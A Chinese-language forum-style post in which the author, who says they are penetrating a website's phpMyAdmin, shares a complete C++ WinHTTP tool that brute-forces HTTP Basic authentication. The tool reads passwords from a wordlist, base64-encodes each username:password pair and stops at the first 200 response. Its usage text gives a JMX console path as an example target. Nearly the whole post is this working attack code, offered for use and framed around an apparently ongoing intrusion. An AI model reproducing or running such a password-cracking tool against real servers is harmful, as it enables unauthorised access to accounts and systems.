最近在渗透一个网站，几个 phpMyAdmin 用的都是 HTTP Basic 认证（服务器返回 401 挑战），于是就想自己写一个爆破工具吧，反正在内网也要用到的。
代码写的很渣渣,如果大家在使用中有什么问题,可以告诉我,我来改正。
// Basic.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <Windows.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <iostream>
#include "Basic.h"
#include <winhttp.h>
#include <comdef.h>
#pragma comment (lib,"Winhttp.lib")
// Standard base64 alphabet; index 64 is the pad character '='.
const char base[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
// Encodes data_len bytes of data and returns a malloc'd NUL-terminated string
// that the caller must free(). Declared with a const input pointer: the
// definition must use this exact signature, otherwise C++ treats it as a
// separate overload and this declaration is left without a definition.
char* base64_encode(const char* data, int data_len);
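// Base64-encodes data_len bytes starting at data (RFC 4648 alphabet, '='
// padding). Returns a malloc'd NUL-terminated string; the caller owns it and
// must free() it. A NULL pointer or a negative length is treated as empty
// input (the old code turned a negative length into a bogus allocation size).
// Allocation failure prints a message and terminates the process with a
// failure status, as the original did (but it used to exit with 0).
char *base64_encode(const char* data, int data_len) //base64_encode function
{
	// Same alphabet as the file-scope `base` table; kept local so the encoder
	// has no dependency on file-scope state.
	static const char kAlphabet[] =
		"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

	if (data == NULL || data_len < 0)
	{
		data_len = 0;
	}

	// Every group of up to 3 input bytes becomes exactly 4 output chars.
	size_t groups = ((size_t)data_len + 2) / 3;
	size_t out_len = groups * 4 + 1;   // + terminator
	char *ret = (char *)malloc(out_len);
	if (ret == NULL)
	{
		printf("No enough memory.\n");
		exit(EXIT_FAILURE);
	}

	// Work on unsigned bytes so values >= 0x80 are not sign-extended.
	const unsigned char *in = (const unsigned char *)data;
	char *out = ret;
	size_t pos = 0;
	while (pos < (size_t)data_len)
	{
		size_t avail = (size_t)data_len - pos;
		size_t n = avail < 3 ? avail : 3;

		// Pack up to 3 bytes big-endian into 24 bits; missing bytes are zero.
		unsigned int triple = 0;
		for (size_t k = 0; k < 3; k++)
		{
			triple <<= 8;
			if (k < n)
			{
				triple |= in[pos + k];
			}
		}
		pos += n;

		out[0] = kAlphabet[(triple >> 18) & 0x3F];
		out[1] = kAlphabet[(triple >> 12) & 0x3F];
		out[2] = (n > 1) ? kAlphabet[(triple >> 6) & 0x3F] : '=';
		out[3] = (n > 2) ? kAlphabet[triple & 0x3F] : '=';
		out += 4;
	}
	*out = '\0';
	return ret;
}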
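// Maps one base64 character to its 6-bit value (0..63), 64 for the '=' pad,
// or -1 when ch is not part of the alphabet. The old strrchr() version
// subtracted a NULL pointer for characters outside the table (undefined
// behaviour) and returned 65 for '\0' (the terminator's index). Computed
// arithmetically so it needs no table; relies on the contiguous ASCII
// letter/digit ranges, which holds on every Windows target.
static char find_pos(char ch)
{
	if (ch >= 'A' && ch <= 'Z') return (char)(ch - 'A');
	if (ch >= 'a' && ch <= 'z') return (char)(26 + (ch - 'a'));
	if (ch >= '0' && ch <= '9') return (char)(52 + (ch - '0'));
	if (ch == '+') return 62;
	if (ch == '/') return 63;
	if (ch == '=') return 64;
	return -1;
}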
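// Sends one GET to http://Host:Port/HostPath carrying the prebuilt
// Send_result header line ("Authorization:Basic <base64>") and reports the
// outcome. Returns the HTTP status code, or -1 when any WinHTTP call fails
// (the Win32 error is printed). A 200 response is treated as a valid
// credential: the function prints the success message and calls exit(0), as
// before, so the wordlist loop in main() stops. All handles are closed on
// every path, including the success path.
//
// Caveats for the operator:
//  - plaintext HTTP only: the credential crosses the wire unencrypted
//    (WinHttpOpenRequest is called without WINHTTP_FLAG_SECURE);
//  - WinHTTP follows redirects by default, so a server that redirects
//    unauthenticated requests to a 200 login page will look like a hit on
//    the very first candidate.
int request_http(wchar_t* Host, int Port,wchar_t* HostPath,wchar_t* Send_result) //send_http function
{
	HINTERNET hSession = NULL;
	HINTERNET hConnect = NULL;
	HINTERNET hRequest = NULL;
	DWORD dwStatusCode = 0;
	DWORD dwSize = sizeof(dwStatusCode);
	BOOL ok = FALSE;
	int result = -1;

	hSession = WinHttpOpen(L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36",
	                       WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
	                       WINHTTP_NO_PROXY_NAME,
	                       WINHTTP_NO_PROXY_BYPASS,
	                       0);
	if (hSession == NULL)
		goto cleanup;

	// Bound every phase (resolve/connect/send/receive, in ms) so one dead
	// host does not hang the whole run.
	WinHttpSetTimeouts(hSession, 10000, 10000, 10000, 10000);

	hConnect = WinHttpConnect(hSession, Host, (INTERNET_PORT)Port, 0);
	if (hConnect == NULL)
		goto cleanup;

	hRequest = WinHttpOpenRequest(hConnect, L"GET", HostPath, NULL,
	                              WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, 0);
	if (hRequest == NULL)
		goto cleanup;

	// Each step is gated on the previous one; the old code added the Accept
	// header unconditionally, even when hRequest was NULL.
	ok = WinHttpAddRequestHeaders(hRequest, Send_result, (ULONG)-1L, WINHTTP_ADDREQ_FLAG_ADD);
	if (ok)
		ok = WinHttpAddRequestHeaders(hRequest,
		                              L"Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
		                              (ULONG)-1L, WINHTTP_ADDREQ_FLAG_ADD);
	if (ok)
		ok = WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0, NULL, 0, NULL, 0);
	if (ok)
		ok = WinHttpReceiveResponse(hRequest, NULL);
	// Ask for the numeric status directly instead of scanning the raw header
	// block for "HTTP/1.1 200": no header buffer to size or leak, no NULL
	// dereference when that buffer was never allocated, and HTTP/1.0 replies
	// are recognised too.
	if (ok)
		ok = WinHttpQueryHeaders(hRequest,
		                         WINHTTP_QUERY_STATUS_CODE | WINHTTP_QUERY_FLAG_NUMBER,
		                         WINHTTP_HEADER_NAME_BY_INDEX,
		                         &dwStatusCode, &dwSize, WINHTTP_NO_HEADER_INDEX);
	if (ok)
		result = (int)dwStatusCode;

cleanup:
	// Read the error before the close calls can overwrite it.
	if (!ok)
		printf("Error %lu has occurred.\n", (unsigned long)GetLastError());
	if (hRequest) WinHttpCloseHandle(hRequest);
	if (hConnect) WinHttpCloseHandle(hConnect);
	if (hSession) WinHttpCloseHandle(hSession);

	if (result == 200)
	{
		printf("Password Crack susccessful\r\n");
		exit(0);
	}
	return result;
}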
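// Usage: Basic <host> <port> <path> <username>
// Reads candidate passwords from pass.txt (one per line) in the working
// directory and tries each as "<username>:<password>" via HTTP Basic auth
// against http://host:port/path. request_http() stops the program on the
// first 200 response. Returns 1 on bad arguments, 0 otherwise.
int main(int argc,char* argv[])
{
	if (argc < 5)
	{
		printf("[-]:Usage %s Crack Basic authentication T00ls\r\n",argv[0]);
		printf("[-]:Usage %s 1.0.0.1 8080 /jmx-console/ Admin\r\n",argv[0]);
		printf("[-]:Usage %s Warning:Not supported by HTTPS\r\n",argv[0]);
		return 0;
	}

	wchar_t Hostname[256] = {0};
	wchar_t HostPath[1024] = {0};
	wchar_t Send_result[1024] = {0};   // full "Authorization:Basic <b64>" header line
	char input[255] = {0};             // "user:password" before encoding
	char buffer[MAX_PATH] = {0};       // one wordlist line
	char *Username = argv[4];

	// Bounded ANSI -> UTF-16 conversion of host and path. wsprintf(L"%S")
	// knows nothing about the destination size, so an over-long argument
	// used to run past the end of these arrays. MultiByteToWideChar returns
	// 0 when the string (terminator included) does not fit.
	if (MultiByteToWideChar(CP_ACP, 0, argv[1], -1, Hostname,
	                        (int)(sizeof(Hostname) / sizeof(Hostname[0]))) == 0)
	{
		printf("Host argument is too long or invalid\r\n");
		return 1;
	}
	if (MultiByteToWideChar(CP_ACP, 0, argv[3], -1, HostPath,
	                        (int)(sizeof(HostPath) / sizeof(HostPath[0]))) == 0)
	{
		printf("Path argument is too long or invalid\r\n");
		return 1;
	}

	// atoi() silently turns junk into 0; require a complete numeric TCP port.
	char *end = NULL;
	long port = strtol(argv[2], &end, 10);
	if (end == argv[2] || *end != '\0' || port < 1 || port > 65535)
	{
		printf("Invalid port: %s\r\n", argv[2]);
		return 1;
	}

	FILE* fp = fopen("pass.txt","rb"); //fopen filesName
	if (fp == NULL)
	{
		// fopen reports through errno, not GetLastError().
		printf("Read files:pass.txt Error :%s\r\n", strerror(errno));
		return 0;
	}

	int line = 0;
	size_t user_len = strlen(Username);
	while (fgets(buffer, (int)sizeof(buffer), fp) != NULL)
	{
		// Strip the line terminator. The file is opened in binary mode, so a
		// CRLF wordlist leaves a '\r' behind; the old code removed only '\n'
		// and then chopped the last byte of every candidate to compensate,
		// which silently corrupted passwords read from LF-only files.
		size_t slen = strlen(buffer);
		while (slen > 0 && (buffer[slen - 1] == '\n' || buffer[slen - 1] == '\r'))
		{
			buffer[--slen] = '\0';
		}
		++line;

		// "user:password" plus terminator must fit in input[]; skip (and say
		// so) rather than overflow the stack buffer with sprintf.
		if (user_len + 1 + slen >= sizeof(input))
		{
			printf("Password Line:%d skipped (too long)\r\n", line);
			continue;
		}
		sprintf(input, "%s:%s", Username, buffer);

		// Encode the whole credential (the old strlen()-1 dropped a byte).
		char *encoded = base64_encode(input, (int)strlen(input));
		// input[] holds at most 254 bytes, so the encoded form is at most
		// 340 characters and fits Send_result with room to spare.
		wsprintfW(Send_result, L"Authorization:Basic %S", encoded);
		free(encoded);   // base64_encode returns malloc'd memory; the old loop leaked one block per line

		// The candidate is echoed in clear and sent over plain HTTP.
		printf("Crack:%S->%d->%S->Password Line:%d->%s\r\n", Hostname, (int)port, HostPath, line, input);
		request_http(Hostname, (int)port, HostPath, Send_result);
	}
	fclose(fp);
	return 0;
}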